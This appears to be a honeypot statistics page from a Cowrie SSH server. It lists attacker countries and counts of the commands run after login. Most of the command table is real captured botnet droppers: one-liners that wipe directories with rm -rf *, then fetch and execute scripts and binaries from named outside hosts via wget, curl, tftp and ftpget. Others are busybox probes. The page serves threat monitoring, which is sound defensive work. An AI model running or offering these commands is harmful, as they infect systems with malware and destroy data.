Weekly Statistics

The following are stats from a server running the Cowrie SSH honeypot. The tables below show the most common payloads and commands run after connecting to the honeypot, as well as the top IP addresses and countries.
This list is updated hourly, compiling results over the previous week.

Payloads


Countries

Country | Count
Russia | 1152
United States | 1023
Poland | 937
Ukraine | 574
South Korea | 252

Connection IPs


Commands

Command Run | Count
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf *; wget http://betaalverzoek.ir/binInfect.sh; curl -O http://betaalverzoek.ir/binInfect.sh; chmod 777 binInfect.sh; sh binInfect.sh; tftp betaalverzoek.ir -c get binInfect.sh; chmod 777 binInfect.sh; sh binInfect.sh; tftp -r binInfect2.sh -g betaalverzoek.ir; chmod 777 binInfect2.sh; sh binInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 betaalverzoek.ir binInfect1.sh binInfect1.sh; sh binInfect1.sh; rm -rf binInfect.sh binInfect.sh binInfect2.sh binInfect1.sh; rm -rf * | 4974
sh | 4974
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.57.111/ssh || curl -o ssh 209.141.57.111/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd; ./krane 1qaz@WSX | 4954
uname -a | 4954
nproc; uname -a | 4942
cd /tmp; rm -rf x86_64; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 x86_64; wget http://188.213.49.167/i686; chmod 777 *; ./i686 i686; echo ur mama | 4913
yum install wget -y; apt install wget -y;cd /tmp || cd /run || cd /; wget http://212.192.241.44/Gbotbins.sh; chmod 777 Gbotbins.sh; sh Gbotbins.sh; tftp 212.192.241.44 -c get Gbottftp1.sh; chmod 777 Gbottftp1.sh; sh Gbottftp1.sh; tftp -r Gbottftp2.sh -g 212.192.241.44; chmod 777 Gbottftp2.sh; sh Gbottftp2.sh; rm -rf Gbotbins.sh Gbottftp1.sh Gbottftp2.sh; rm -rf * | 4886
/bin/busybox cat /bin/busybox | 4864
/bin/busybox TSUNAMI | 4864
linuxshell | 4864
shell | 4863
system | 4863
enable | 4863